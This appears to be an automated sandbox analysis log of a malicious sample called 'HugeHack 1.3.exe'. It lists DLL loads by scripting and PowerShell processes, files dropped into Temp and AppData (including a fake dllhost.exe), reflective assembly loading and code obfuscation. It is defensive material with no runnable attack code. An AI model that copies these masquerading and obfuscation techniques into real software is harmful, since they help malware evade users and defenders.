Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: HugeHack 1.3.exe.bin.exe

Static file information: File size 6767104 > 1048576

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: HugeHack 1.3.exe.bin.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x672000

Source:

Data Obfuscation

.NET source code contains potential unpacker

Source: Payload.exe.0.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: dllhost.exe.2.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: ClickMe.exe.2.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: c382eb151c59bd833b24120723eac541.exe.16.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])

PE file contains an invalid checksum

Source: dllhost.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x115b5
Source: c382eb151c59bd833b24120723eac541.exe.16.dr	Static PE information: real checksum: 0x0 should be: 0x115b5
Source: HugeHack 1.3.exe.bin.exe	Static PE information: real checksum: 0xb6dd should be: 0x682a2e
Source: Payload.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x115b5
Source: webhook.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xd23c1
Source: ClickMe.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x115b5

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E829A8 pushfd ; ret	2_2_00E829EE
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E82CA1 pushfd ; ret	2_2_00E82D1A
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_065B5D10 push es; ret	3_2_065B5D20
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F92EA0 pushfd ; retf	3_2_07F92EA1
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F9E17F push esp; ret	3_2_07F9E193
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15200738 push eax; ret	5_3_15200739
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15208302 push eax; ret	5_3_152082F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15208302 push eax; ret	5_3_152082F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520BB63 push eax; ret	5_3_1520BB79
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520BB63 push eax; ret	5_3_1520BB79
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15204970 push eax; ret	5_3_15204971
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15204970 push eax; ret	5_3_15204971
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15201D47 push eax; ret	5_3_15201E21
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520C9B8 push eax; ret	5_3_1520C9B9
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520C9B8 push eax; ret	5_3_1520C9B9
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152085F0 push eax; ret	5_3_152085F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152085F0 push eax; ret	5_3_152085F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520C3F8 push eax; retf	5_3_1520C3FD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520C3F8 push eax; retf	5_3_1520C3FD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15202BC0 push eax; ret	5_3_15202BC1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520ADD0 push eax; ret	5_3_1520ADD1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520ADD0 push eax; ret	5_3_1520ADD1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_151FD610 push eax; ret	5_3_151FD611
